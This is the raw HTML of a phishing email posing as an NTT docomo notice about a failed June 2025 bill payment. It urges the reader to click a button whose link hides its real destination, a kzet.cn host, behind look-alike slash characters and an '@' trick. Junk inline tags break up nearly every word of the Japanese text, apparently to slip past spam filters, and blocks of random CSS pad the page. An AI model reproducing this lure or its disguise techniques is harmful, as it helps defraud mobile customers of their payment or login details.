NTTドコモの料金支払い手続きME=6705787236761
<html lang=ja xmlns="http://www.w3.org/1999/xhtml"><head><title>[PR]タクでベゅっリべ</title><meta content=ja http-equiv=Content-Language><meta content="text/html; charset=utf-8" http-equiv=Content-Type><meta content=text/css http-equiv=Content-Style-Type><style type=text/css><style> body { font-family: 'Meiryo', 'Hiragino Kaku Gothic Pro', sans-serif; line-height: 1.6; color: #333; max-width: 600px; margin: 0 auto; padding: 20px; } .header { color: #d62027; font-size: 18px; font-weight: bold; margin-bottom: 20px; border-bottom: 2px solid #d62027; padding-bottom: 5px; } .payment-notice { background-color: #f8f9fa; padding: 15px; border-radius: 5px; margin: 15px 0; } .payment-methods { background-color: #fff8e6; padding: 15px; border-radius: 5px; margin: 15px 0; } .button { display: inline-block; background-color: #d62027; color: white; padding: 12px 24px; text-decoration: none; border-radius: 4px; margin: 15px 0; font-weight: bold; } .note { font-size: 13px; color: #666; margin: 15px 0; } .contact { margin-top: 20px; padding-top: 15px; border-top: 1px solid #eee; } .footer { font-size: 12px; color: #777; margin-top: 30px; border-top: 1px solid #eee; padding-top: 15px; } </style><style>#lhtjtguhlbc #Jlhatvpg-Fkwcz-Gxqvnmg .Zdqemdkty .spf-eanzwduuf #Fhcp-Uur .czdemdfeapthgieiw #qJkBJvOVVR-PfkwZNY-HaXuE #Hymxiccmk-Pmcihhfcy-Bweo {line-height:normal;box-sizing:content-box;}</style><style>
#Yqpwazzhjn-Pmmw-Vpezfkjcur #Wtir-Onbtta-Llfeueg .bmZNBnAesCkdANOVZ .cwdkuzeyz-faabsc .Hnr-Mjjxlj-Eilisecpzo #Srk-xcJ #crwyIbvcLCfqUDItCaf {
writing-mode:horizontal-tb;
table-layout:auto;
}
</style><style>
.ipyu-HWuuaoLx .tbaCxGv-AIh .Jwynwcoiw-Kmeqcv .YPWC-JCUvUbAvXB .yrmybeodz-tzrcpi #iyvifelvyzor #Qws-Ttz-Scdlfyxcm #Wcjgtp #vOLn-yKFxpJrf #MmUbTek {
word-spacing:normal;
table-layout:auto;
}
</style></head><body><div class=header>docomo料金のお支払いについて</div><div>いつもdocomoをご利用いただきありがとうございます。<br>このた<mktz>び</mktz>、<ekjn>【</ekjn>お客様<forve>番</forve>号】様<wlydyr>の</wlydyr>【2<uuhs>0</uuhs>25<hzxonk>年</hzxonk>06月<tyggqdcv>】</tyggqdcv>分<phgunh>の</phgunh>料金<izjpc>の</izjpc>お支払<ryot>い</ryot>が正常<zjzrax>に</zjzrax>完<ndz>了</ndz>しなか<ckkmmqs>っ</ckkmmqs>たこ<fnd>と</fnd>を<ayfnb>お</ayfnb>知らせ<pxgdnkei>い</pxgdnkei>た<kgisvhl>し</kgisvhl>ます。</div><div class=payment-notice><div>大変お手数ですが、以下の方法にて再度お支払い手続きをお願いいたします。</div></div><div class=payment-methods><div><strong>お支払い方法</strong></div><ul> <li>docomoアプリまたはMy docomoからクレジットカードでお支払い <li>コンビニエンスストアでのお支払い <li>銀行ATMまたはネットバンキングでのお支払い </li></ul></div><a class=button href="https://fvisp.com∕keolfm∕dmtty∕dajmo∕ipwqmy∕dedhyl∕xsorlvkbbj∕lpjiguyvjy@kzet.cn/">ご利用確認はこちら</a> <div class=note><div>※既にお支払い済みの場合は、本メッセージを無視していただいて結構です。</div></div><div class=contact><div>docomoカスタマーセンター:0120-800-000<br>受付時間:9:00~20:00(年中無休</div></div><div class=footer><div>※本メールは送信専用です。返信いただいてもご回答できませんのでご了承ください。</div><div>ご不便とご心配をおかけしまして誠に申し訳ございませんが、<BR>何とぞご理解賜りたくお願い申しあげます。</div></div><br><br></body></html>